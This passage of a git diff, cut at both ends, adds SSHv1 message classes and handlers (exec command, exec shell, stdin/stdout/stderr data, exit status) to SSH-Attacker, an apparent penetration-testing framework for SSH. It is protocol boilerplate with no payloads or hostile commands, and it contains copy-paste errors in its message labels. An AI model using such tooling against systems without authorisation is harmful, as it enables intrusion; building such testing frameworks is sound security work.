LOGGER.warn( + "Recieved a Ignore Message, Reason: {}", + message.getIgnoreMessage().getValue()); + //sshContext.setDisconnectMessageReceived(true); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StderrDataMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StderrDataMessageSSHV1Handler.java new file mode 100644 index 000000000..f8975d378 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StderrDataMessageSSHV1Handler.java @@ -0,0 +1,38 @@ + +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StderrDataMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdoutDataMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class StderrDataMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public StderrDataMessageSSHV1Handler(SshContext context) { + super(context); + } + + /*public HybridKeyExchangeReplyMessageHandler( + SshContext context, HybridKeyExchangeReplyMessage message) { + super(context, message); + }*/ + + @Override + public void adjustContext(StderrDataMessageSSH1 message) { + LOGGER.warn( + "Recieved Stderr Data: {}", + message.getData().getValue()); + //sshContext.setDisconnectMessageReceived(true); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StdinDataMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StdinDataMessageSSHV1Handler.java new file mode 100644 index 000000000..79deaa050 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StdinDataMessageSSHV1Handler.java @@ -0,0 +1,37 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DebugMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class StdinDataMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public StdinDataMessageSSHV1Handler(SshContext context) { + super(context); + } + + /*public HybridKeyExchangeReplyMessageHandler( + SshContext context, HybridKeyExchangeReplyMessage message) { + super(context, message); + }*/ + + @Override + public void adjustContext(StdinDataMessageSSH1 message) { + LOGGER.warn( + "Recieved Stdin Data: {}", + message.getData().getValue()); + //sshContext.setDisconnectMessageReceived(true); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StdoutDataMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StdoutDataMessageSSHV1Handler.java new file mode 100644 index 000000000..afc4d078a --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/StdoutDataMessageSSHV1Handler.java @@ -0,0 +1,37 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdinDataMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.StdoutDataMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class StdoutDataMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public StdoutDataMessageSSHV1Handler(SshContext context) { + super(context); + } + + /*public HybridKeyExchangeReplyMessageHandler( + SshContext context, HybridKeyExchangeReplyMessage message) { + super(context, message); + }*/ + + @Override + public void adjustContext(StdoutDataMessageSSH1 message) { + LOGGER.warn( + "Recieved Stdout Data: {}", + message.getData().getValue()); + //sshContext.setDisconnectMessageReceived(true); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DebugMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DebugMessageSSH1.java new file mode 100644 index 000000000..885eaf786 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/DebugMessageSSH1.java @@ -0,0 +1,66 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.DebugMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.DebugMessageSSHv1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.DebugMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.DebugMessageSSHV1Serializier; + +import java.io.InputStream; + +public class DebugMessageSSH1 extends SshMessage { + + private ModifiableString debugMessage; + + public ModifiableString getDebugMessage() { + return debugMessage; + } + + public void setDebugMessage(ModifiableString disconnectReason) { + debugMessage = disconnectReason; + } + + public void setDebugMessage(String disconnectReason) { + debugMessage = + ModifiableVariableFactory.safelySetValue(debugMessage, disconnectReason); + } + + @Override + public DebugMessageSSHV1Handler getHandler(SshContext context) { + return new DebugMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new DebugMessageSSHv1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new DebugMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new DebugMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "Disconnect Message"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/EofMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/EofMessageSSH1.java new file mode 100644 index 000000000..330e3df21 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/EofMessageSSH1.java @@ -0,0 +1,52 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.EofMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.SuccessMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.EofMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.SuccessMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.EofMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.SuccessMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.EofMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.SuccessMessageSerializier; + +import java.io.InputStream; + +public class EofMessageSSH1 extends SshMessage { + + @Override + public EofMessageSSHV1Handler getHandler(SshContext context) { + return new EofMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser(SshContext context, InputStream stream) { + return new EofMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new EofMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new EofMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_CMSG_EOF"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExecCmdMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExecCmdMessageSSH1.java new file mode 100644 index 000000000..a6dbd85b8 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExecCmdMessageSSH1.java @@ -0,0 +1,70 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.DebugMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ExecCmdMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.DebugMessageSSHv1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ExecCmdMessageSSHv1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.DebugMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ExecCmdMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.DebugMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ExecCmdMessageSSHV1Serializier; + +import java.io.InputStream; + +public class ExecCmdMessageSSH1 extends SshMessage { + + private ModifiableString command; + + public ModifiableString getCommand() { + return command; + } + + public void setCommand(ModifiableString disconnectReason) { + command = disconnectReason; + } + + public void setCommand(String disconnectReason) { + command = + ModifiableVariableFactory.safelySetValue(command, disconnectReason); + } + + @Override + public ExecCmdMessageSSHV1Handler getHandler(SshContext context) { + return new ExecCmdMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new ExecCmdMessageSSHv1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new ExecCmdMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new ExecCmdMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "Disconnect Message"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExecShellMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExecShellMessageSSH1.java new file mode 100644 index 000000000..1d8ffc1fa --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExecShellMessageSSH1.java @@ -0,0 +1,52 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ExecShellMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.SuccessMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ExecShellMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.SuccessMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ExecShellMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.SuccessMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ExecShellMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.SuccessMessageSerializier; + +import java.io.InputStream; + +public class ExecShellMessageSSH1 extends SshMessage { + + @Override + public ExecShellMessageSSHV1Handler getHandler(SshContext context) { + return new ExecShellMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser(SshContext context, InputStream stream) { + return new ExecShellMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new ExecShellMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new ExecShellMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_CMSG_EXEC_SHELL"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExitConfirmationMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExitConfirmationMessageSSH1.java new file mode 100644 index 000000000..612006b21 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExitConfirmationMessageSSH1.java @@ -0,0 +1,52 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.EofMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ExitConfirmationMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.EofMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ExitConfirmationMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.EofMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ExitConfirmationMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.EofMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ExitConfirmationMessageSSHV1Serializier; + +import java.io.InputStream; + +public class ExitConfirmationMessageSSH1 extends SshMessage { + + @Override + public ExitConfirmationMessageSSHV1Handler getHandler(SshContext context) { + return new ExitConfirmationMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser(SshContext context, InputStream stream) { + return new ExitConfirmationMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new ExitConfirmationMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new ExitConfirmationMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_CMSG_EOF"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExitStatusMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExitStatusMessageSSH1.java new file mode 100644 index 000000000..5986904c8 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ExitStatusMessageSSH1.java @@ -0,0 +1,70 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ExitConfirmationMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ExitStatusMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ExitConfirmationMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ExitStatusMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ExitConfirmationMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ExitStatusMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ExitConfirmationMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ExitStatusMessageSSHV1Serializier; + +import java.io.InputStream; + +public class ExitStatusMessageSSH1 extends SshMessage { + + private ModifiableInteger exitStatus; + + public ModifiableInteger getExitStatus() { + return exitStatus; + } + + public void setExitStatus(ModifiableInteger exitStatus) { + this.exitStatus = exitStatus; + } + + public void setExitStatus(int exitStatus) { + this.exitStatus = + ModifiableVariableFactory.safelySetValue(this.exitStatus, exitStatus); + } + + @Override + public ExitStatusMessageSSHV1Handler getHandler(SshContext context) { + return new ExitStatusMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser(SshContext context, InputStream stream) { + return new ExitStatusMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new ExitStatusMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new ExitStatusMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_CMSG_EOF"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/IgnoreMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/IgnoreMessageSSH1.java new file mode 100644 index 000000000..a2abc1d70 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/IgnoreMessageSSH1.java @@ -0,0 +1,67 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.IgnoreMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.IgnoreMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.IgnoreMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.IgnoreMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.transport.serializer.IgnoreMessageSerializer; + +import java.io.InputStream; + +public class IgnoreMessageSSH1 extends SshMessage { + + private ModifiableString ignoreMessage; + + public ModifiableString getIgnoreMessage() { + return ignoreMessage; + } + + public void setIgnoreReason(ModifiableString disconnectReason) { + ignoreMessage = disconnectReason; + } + + public void setIgnoreReason(String disconnectReason) { + ignoreMessage = + ModifiableVariableFactory.safelySetValue(ignoreMessage, disconnectReason); + } + + @Override + public IgnoreMessageSSHV1Handler getHandler(SshContext context) { + return new IgnoreMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new IgnoreMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new IgnoreMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new IgnoreMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "Disconnect Message"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StderrDataMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StderrDataMessageSSH1.java new file mode 100644 index 000000000..b22b53dce --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StderrDataMessageSSH1.java @@ -0,0 +1,70 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.StderrDataMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.StdoutDataMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.StderrDataMessageSSHv1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.StdoutDataMessageSSHv1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.StderrDataMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.StdoutDataMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.StderrDataMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.StdoutDataMessageSSHV1Serializier; + +import java.io.InputStream; + +public class StderrDataMessageSSH1 extends SshMessage { + + private ModifiableString data; + + public ModifiableString getData() { + return data; + } + + public void setData(ModifiableString disconnectReason) { + data = disconnectReason; + } + + public void setData(String disconnectReason) { + data = + ModifiableVariableFactory.safelySetValue(data, disconnectReason); + } + + @Override + public StderrDataMessageSSHV1Handler getHandler(SshContext context) { + return new StderrDataMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new StderrDataMessageSSHv1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new StderrDataMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new StderrDataMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "Disconnect Message"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StdinDataMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StdinDataMessageSSH1.java new file mode 100644 index 000000000..833e4b839 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StdinDataMessageSSH1.java @@ -0,0 +1,70 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.DebugMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.StdinDataMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.DebugMessageSSHv1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.StdinDataMessageSSHv1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.DebugMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.StdinDataMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.DebugMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.StdinDataMessageSSHV1Serializier; + +import java.io.InputStream; + +public class StdinDataMessageSSH1 extends SshMessage { + + private ModifiableString data; + + public ModifiableString getData() { + return data; + } + + public void setData(ModifiableString disconnectReason) { + data = disconnectReason; + } + + public void setData(String disconnectReason) { + data = + ModifiableVariableFactory.safelySetValue(data, disconnectReason); + } + + @Override + public StdinDataMessageSSHV1Handler getHandler(SshContext context) { + return new StdinDataMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new StdinDataMessageSSHv1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new StdinDataMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new StdinDataMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "Disconnect Message"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StdoutDataMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StdoutDataMessageSSH1.java new file mode 100644 index 000000000..a2e6c5b91 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/StdoutDataMessageSSH1.java @@ -0,0 +1,70 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.StdinDataMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.StdoutDataMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.StdinDataMessageSSHv1Parser; +import 